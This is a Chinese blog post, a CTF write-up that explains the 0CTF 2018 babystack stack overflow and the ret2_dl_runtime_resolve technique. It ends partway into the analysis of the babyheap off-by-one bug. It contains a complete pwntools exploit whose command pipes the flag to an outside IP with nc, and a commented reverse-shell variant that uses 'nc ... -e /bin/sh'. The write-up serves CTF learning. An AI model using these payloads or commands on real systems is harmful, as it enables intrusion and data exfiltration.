<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="n74fzVGuzCcR7QhYWu-qaPH7lKOjZC3b3tDU0egKMNA" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="0ctf-baby题最近有时间了就会做做之前的题目，这里是今年0ctf前两道baby题，一道是栈的题、一道是堆的题。后面的题还不会做，先从简单一点的开始（太菜了）。 babystack这道题原题是这样的： 首先向我们输出了一个chal的值，并需要我们输入4个字节内容，输入的内容需要满足经过计算后得到的结果以\0\0\0开始，满足了这个check之后从输入流中读取0x100字节的数据，接着才正式启动">
<meta property="og:type" content="article">
<meta property="og:title" content="0ctf2018-baby题">
<meta property="og:url" content="https://e3pem.github.io/2018/10/18/0ctf-2018/0ctf-baby题/index.html">
<meta property="og:site_name" content="e3pem&#39;s Blog">
<meta property="og:description" content="0ctf-baby题最近有时间了就会做做之前的题目，这里是今年0ctf前两道baby题，一道是栈的题、一道是堆的题。后面的题还不会做，先从简单一点的开始（太菜了）。 babystack这道题原题是这样的： 首先向我们输出了一个chal的值，并需要我们输入4个字节内容，输入的内容需要满足经过计算后得到的结果以\0\0\0开始，满足了这个check之后从输入流中读取0x100字节的数据，接着才正式启动">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/91917330.jpg">
<meta property="og:image" content="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/20404392.jpg">
<meta property="og:image" content="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/77993460.jpg">
<meta property="og:updated_time" content="2018-11-14T07:17:58.045Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0ctf2018-baby题">
<meta name="twitter:description" content="0ctf-baby题最近有时间了就会做做之前的题目，这里是今年0ctf前两道baby题，一道是栈的题、一道是堆的题。后面的题还不会做，先从简单一点的开始（太菜了）。 babystack这道题原题是这样的： 首先向我们输出了一个chal的值，并需要我们输入4个字节内容，输入的内容需要满足经过计算后得到的结果以\0\0\0开始，满足了这个check之后从输入流中读取0x100字节的数据，接着才正式启动">
<meta name="twitter:image" content="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/91917330.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://e3pem.github.io/2018/10/18/0ctf-2018/0ctf-baby题/"/>





  <title>0ctf2018-baby题 | e3pem's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">e3pem's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://e3pem.github.io/2018/10/18/0ctf-2018/0ctf-baby题/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="e3pem">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="e3pem's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">0ctf2018-baby题</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-10-18T18:21:16+08:00">
                2018-10-18
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0ctf-baby题"><a href="#0ctf-baby题" class="headerlink" title="0ctf-baby题"></a>0ctf-baby题</h1><p>最近有时间了就会做做之前的题目，这里是今年0ctf前两道baby题，一道是栈的题、一道是堆的题。后面的题还不会做，先从简单一点的开始（太菜了）。</p>
<h2 id="babystack"><a href="#babystack" class="headerlink" title="babystack"></a>babystack</h2><p>这道题原题是这样的：<br><img src="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/91917330.jpg" alt=""></p>
<p>首先向我们输出了一个<code>chal</code>的值，并需要我们输入4个字节内容，输入的内容需要满足经过计算后得到的结果以<code>\0\0\0</code>开始，满足了这个check之后从输入流中读取0x100字节的数据，接着才正式启动存在问题的程序<code>babystack</code>，并将输入的0x100数据传给该程序。</p>
<h3 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h3><p>由于是在本机做的这道题，就直接启动了babystack开始调试，下面看一下该程序存在什么问题：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">ssize_t</span> sub_804843B()</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [sp+0h] [bp-28h]@1</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, &amp;buf, <span class="number">0x40</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到程序内容简直再简单不过了，直接往buf中读取0x40字节的数据，而实际栈上的空间只有0x28字节，这里存在栈溢出。</p>
<p>查看一下程序开启了哪些保护：<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ checksec babystack </span><br><span class="line">[*] <span class="string">'/home/ym/Desktop/ctf/0ctf/babystack/babystack'</span></span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure></p>
<p>32位程序，没有开启canary，可以放心的栈溢出，也没有开启PIE。但是这里有一个问题，程序没有任何输出，读入0x40字节的数据后就直接结束运行了，所以我们没办法泄露libc的地址。所以这里就是一个在没有办法泄露地址的情况下控制程序流程的栈溢出利用了。</p>
<h3 id="dl-runtime-resolve函数介绍"><a href="#dl-runtime-resolve函数介绍" class="headerlink" title="dl_runtime_resolve函数介绍"></a>dl_runtime_resolve函数介绍</h3><p>看了网上大佬们的wp，知道了这题要用<code>ret2_dl_runtime_resolve</code>这种方法来解，于是就把这种方法学习了一遍，主要参考了这两篇文章：</p>
<blockquote>
<p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced_rop/#ret2_dl_runtime_resolve" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced_rop/#ret2_dl_runtime_resolve</a><br><a href="http://pwn4.fun/2016/11/09/Return-to-dl-resolve/" target="_blank" rel="noopener">http://pwn4.fun/2016/11/09/Return-to-dl-resolve/</a> (这篇文章里面的图片找不到资源了)</p>
</blockquote>
<p>之前在劫持程序的执行流程的时候，有一种思路就是修改程序的got表，把它改成system\execve等函数的地址，并传递给他们合适的参数来拿到shell（对于got表的介绍可以去网上查一查，最好自己动手调一调）。got表里面存放的是动态获取到的函数的真实地址，程序在第一次执行某个来自外部的函数之前是不知道这个函数的真实地址是多少的，那他是怎么知道这个真实地址的呢？</p>
<p>答案就是通过<code>dl_runtime_resolve</code>这个函数（以read为例）来获取的，该函数获取真实地址的流程大致如下：</p>
<p>第一次调用read函数，根据plt表中的指令<code>jmp dword ptr[got@read]</code>来跳转到got表中存储的地址处，这里由于是第一次调用，地址指向的是plt表中<code>jmp dword[got@read]</code>的下一条指令。</p>
<p><img src="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/20404392.jpg" alt=""></p>
<p>push参数，并跳转到<code>dl_runtime_resolve</code>函数的地址，这里一共有两个参数分别为<code>link_map、reloc_arg</code>，其中<code>link_map</code>表示read函数在got表中的索引<code>（link_map=*(GOT+4)）</code>，而<code>reloc_arg</code>参数就是用来重定位时主要用到的参数了。<br>这里<code>dl_runtime_resolve</code>的参数分别为0xf7ffd918、0x0，其中reloc_arg=0:<br><img src="http://espem.oss-cn-beijing.aliyuncs.com/18-11-14/77993460.jpg" alt=""></p>
<p>根据<code>reloc_arg</code>在<code>.rel.plt</code>节中找到<strong>函数重定位表</strong>的地址，重定位表为一个包含两个变量的结构体。其中包含的<code>r_offset</code>为got表地址，<code>r_info</code>中以 <code>(index_dynsym &lt;&lt; 8) | 0x7</code>这样的方式存储了动态链接符号表的索引：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf32_Addr	r_offset;		<span class="comment">/* Address */</span></span><br><span class="line">  Elf32_Word	r_info;			<span class="comment">/* Relocation type and symbol index */</span></span><br><span class="line">&#125; Elf32_Rel;</span><br></pre></td></tr></table></figure></p>
<p>使用objdump获取程序的.rel.plt地址如下：<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ objdump -s -j .rel.plt babystack </span><br><span class="line"></span><br><span class="line">babystack:     file format elf32-i386</span><br><span class="line"></span><br><span class="line">Contents of section .rel.plt:</span><br><span class="line"> 80482b0 0ca00408 07010000 10a00408 07020000  ................</span><br><span class="line"> 80482c0 14a00408 07040000                    ........</span><br></pre></td></tr></table></figure></p>
<p>在pwndbg中看到该函数重定位表的内容如下：<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x /5xw 0x80482b0</span><br><span class="line">0x80482b0:	0x0804a00c	0x00000107	0x0804a010	0x00000207</span><br><span class="line">0x80482c0:	0x0804a014</span><br></pre></td></tr></table></figure></p>
<p>其中0x107即为<code>r_info</code>的值，根据<code>r_info</code>的计算方式<code>r_info = (index_dynsym &lt;&lt; 8) | 0x7</code>可以求出来<code>index_dynsym</code>的值为<strong>0x1</strong></p>
<p>根据<code>index_dynsym</code>索引，从.dynsym节中找到<strong>动态链接符号表</strong>的地址，其中<code>index_dynsym</code>的计算方式为<code>index_dynsym = (sym_addr - dynsym) / 0x10</code>，因此可以算出来<code>sym_addr</code>的值为<code>index_dynsym*0x10+dynsym=0x10+0x080481cc=0x80481dc</code>:<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#.dynsym的地址通过objdump获取</span></span><br><span class="line">$ objdump -s -j .dynsym babystack</span><br><span class="line"></span><br><span class="line">babystack:     file format elf32-i386</span><br><span class="line"></span><br><span class="line">Contents of section .dynsym:</span><br><span class="line"> 80481cc 00000000 00000000 00000000 00000000  ................</span><br><span class="line"> 80481dc 1a000000 00000000 00000000 12000000  ................</span><br><span class="line"> 80481ec 1f000000 00000000 00000000 12000000  ................</span><br><span class="line"> 80481fc 37000000 00000000 00000000 20000000  7........... ...</span><br><span class="line"> 804820c 25000000 00000000 00000000 12000000  %...............</span><br><span class="line"> 804821c 0b000000 0c850408 04000000 11001000  ................</span><br></pre></td></tr></table></figure></p>
<p>所以动态链接符号表的内容如下：<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x /10xw 0x80481dc</span><br><span class="line">0x80481dc:	0x0000001a	0x00000000	0x00000000	0x00000012</span><br><span class="line">0x80481ec:	0x0000001f	0x00000000	0x00000000	0x00000012</span><br><span class="line">0x80481fc:	0x00000037	0x00000000</span><br></pre></td></tr></table></figure></p>
<p>该地址对应的结构体为：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf32_Word	st_name;		<span class="comment">/* Symbol name (string tbl index) */</span></span><br><span class="line">  Elf32_Addr	st_value;		<span class="comment">/* Symbol value */</span></span><br><span class="line">  Elf32_Word	st_size;		<span class="comment">/* Symbol size */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span>	st_info;		<span class="comment">/* Symbol type and binding */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span>	st_other;		<span class="comment">/* Symbol visibility */</span></span><br><span class="line">  Elf32_Section	st_shndx;		<span class="comment">/* Section index */</span></span><br><span class="line">&#125; Elf32_Sym;</span><br></pre></td></tr></table></figure></p>
<p>根据其中<code>st_name</code>字段的值，结合.dynstr节找到需要加载的函数名字：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ objdump -s -j .dynstr babystack</span><br><span class="line"></span><br><span class="line">babystack:     file format elf32-i386</span><br><span class="line"></span><br><span class="line">Contents of section .dynstr:</span><br><span class="line"> 804822c 006c6962 632e736f 2e36005f 494f5f73  .libc.so.6._IO_s</span><br><span class="line"> 804823c 7464696e 5f757365 64007265 61640061  tdin_used.read.a</span><br><span class="line"> 804824c 6c61726d 005f5f6c 6962635f 73746172  larm.__libc_star</span><br><span class="line"> 804825c 745f6d61 696e005f 5f676d6f 6e5f7374  t_main.__gmon_st</span><br><span class="line"> 804826c 6172745f 5f00474c 4942435f 322e3000  art__.GLIBC_2.0.</span><br></pre></td></tr></table></figure></p>
<p>函数名字符串所在地址为0x804822c+0x1a：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x /2s 0x804822c+0x1a</span><br><span class="line">0x8048246:	&quot;read&quot;</span><br><span class="line">0x804824b:	&quot;alarm&quot;</span><br></pre></td></tr></table></figure></p>
<p>根据需要加载的函数名字<code>read</code>，找到该函数的真正地址，将该地址存入got表中，并跳转到该函数处执行，就完成了一次动态链接的工作。</p>
<h3 id="ret2-dl-runtime-resolve"><a href="#ret2-dl-runtime-resolve" class="headerlink" title="ret2_dl_runtime_resolve"></a>ret2_dl_runtime_resolve</h3><p>上面主要介绍了<code>dl_runtime_resolve</code>大致的工作流程，包括如何根据参数<code>reloc_arg</code>找到动态加载所需要的各个参数（函数名、got表地址等）。那么我们可以事先伪造好动态加载所需要的各个数据，然后劫持程序流程，让它调用<code>dl_runtime_resolve</code>函数，并控制函数的参数为我们伪造的数据，达到加载任意函数并执行的目的？</p>
<p><code>ret2_dl_runtime_resolve</code>就是这样的思路，通过设置<code>reloc_arg</code>为合理的值，让其指向我们伪造的虚假重定位表，从虚假的重定位表中取得虚假的动态链接符号表的索引，进而从虚假的动态链接符号表中得到一个我们想要加载的函数的名字（通常为system）并执行该函数。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>漏洞利用主要就是参考的上面给出的链接中的内容，exp如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./babystack'</span>)</span><br><span class="line">rop_leave_ret = <span class="number">0x080483a8</span></span><br><span class="line">stack_size = <span class="number">0x800</span></span><br><span class="line">bss_addr = <span class="number">0x0804a020</span> <span class="comment"># readelf -S bof | grep ".bss"</span></span><br><span class="line">base_stage = bss_addr + stack_size</span><br><span class="line"></span><br><span class="line"><span class="comment"># payload1: move stack to bss</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x28</span>+p32(base_stage)</span><br><span class="line">payload += p32(elf.plt[<span class="string">'read'</span>])+p32(rop_leave_ret)+p32(<span class="number">0</span>)+p32(base_stage)+p32(<span class="number">0x100</span><span class="number">-0x40</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># a command to execute</span></span><br><span class="line">cmd = <span class="string">'cat ./flag|nc 104.225.154.188 5555'</span></span><br><span class="line"><span class="comment"># cmd = 'nc 104.225.154.188 5555 -e /bin/sh'</span></span><br><span class="line"><span class="comment"># cmd = "/bin/sh"</span></span><br><span class="line">plt_0 = <span class="number">0x080482f0</span></span><br><span class="line">rel_plt = <span class="number">0x080482b0</span></span><br><span class="line">index_offset = (base_stage + <span class="number">28</span>) - rel_plt</span><br><span class="line"><span class="comment"># write_got = elf.got['write']</span></span><br><span class="line">read_got = elf.got[<span class="string">'read'</span>]</span><br><span class="line">dynsym = <span class="number">0x080481cc</span></span><br><span class="line">dynstr = <span class="number">0x0804822c</span></span><br><span class="line">fake_sym_addr = base_stage + <span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> - ((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>)</span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">index_dynsym = (fake_sym_addr - dynsym) / <span class="number">0x10</span></span><br><span class="line">r_info = (index_dynsym &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line"><span class="comment"># fake_reloc = p32(write_got) + p32(r_info)</span></span><br><span class="line">fake_reloc = p32(read_got)+p32(r_info)</span><br><span class="line">st_name = (fake_sym_addr + <span class="number">0x10</span>) - dynstr</span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(plt_0)</span><br><span class="line">payload2 += p32(index_offset)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += <span class="string">'aaaa'</span></span><br><span class="line">payload2 += <span class="string">'aaaa'</span></span><br><span class="line">payload2 += fake_reloc <span class="comment"># (base_stage+28)</span></span><br><span class="line">payload2 += <span class="string">'B'</span> * align</span><br><span class="line">payload2 += fake_sym <span class="comment"># (base_stage+36)</span></span><br><span class="line">payload2 += <span class="string">"system\x00"</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2))</span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> len(payload)</span><br><span class="line">fp = open(<span class="string">'./input.txt'</span>,<span class="string">'wb'</span>)</span><br><span class="line">fp.write(payload)</span><br><span class="line">fp.write(payload2)</span><br><span class="line">fp.close()</span><br></pre></td></tr></table></figure></p>
<p>exp将利用数据保存在文件input.txt中，babystack程序从该文件中读取输入即可。</p>
<h2 id="babyheap"><a href="#babyheap" class="headerlink" title="babyheap"></a>babyheap</h2><p>看题目的名字就知道这是一道堆上的题，然而和平时做过的堆题又不太相同，也是调了好久……</p>
<h3 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v3; <span class="comment">// rax@2</span></span><br><span class="line"></span><br><span class="line">  gen_random_mem();</span><br><span class="line">  <span class="keyword">do</span></span><br><span class="line">  &#123;</span><br><span class="line">    print_choice();</span><br><span class="line">    v3 = get_int();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">while</span> ( v3 &gt; <span class="number">5</span> );</span><br><span class="line">  JUMPOUT(__CS__, (<span class="keyword">char</span> *)dword_16B0 + dword_16B0[v3]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>程序首先调用了函数<code>gen_random_mem</code>（自己命的名），功能大致是通过mmap函数分配一个随机地址处的内存，并返回该内存，该内存用作一个结构体数组，用来保存后面分配的chunk的指针：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">00000000 chunk_ptr       struc ; (sizeof=0x18, mappedto_1)</span><br><span class="line">00000000 flag            dd ?</span><br><span class="line">00000004 field_4         dd ?</span><br><span class="line">00000008 size            dq ?</span><br><span class="line">00000010 addr            dq ?</span><br><span class="line">00000018 chunk_ptr       ends</span><br></pre></td></tr></table></figure></p>
<p>一共提供了下面的几种功能：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">print_choice</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"1. Allocate"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"2. Update"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"3. Delete"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"4. View"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"5. Exit"</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">"Command: "</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<ul>
<li>allocate：分配指定大小的堆块，最大只能为0x58字节，分配的内存指针存放到之前mmap分配的内存结构体数组中</li>
<li>update：修改结构体数组中指定索引对应的chunk的内容</li>
<li>delete：释放掉分配的堆块，并将其指针内容清0</li>
</ul>
<p>其中在update时，存在off-by-one漏洞：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">fastcall <span class="title">update</span><span class="params">(chunk_ptr *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v1; <span class="comment">// rax@4</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v3; <span class="comment">// [sp+18h] [bp-8h]@1</span></span><br><span class="line">  <span class="keyword">int</span> size; <span class="comment">// [sp+1Ch] [bp-4h]@5</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Index: 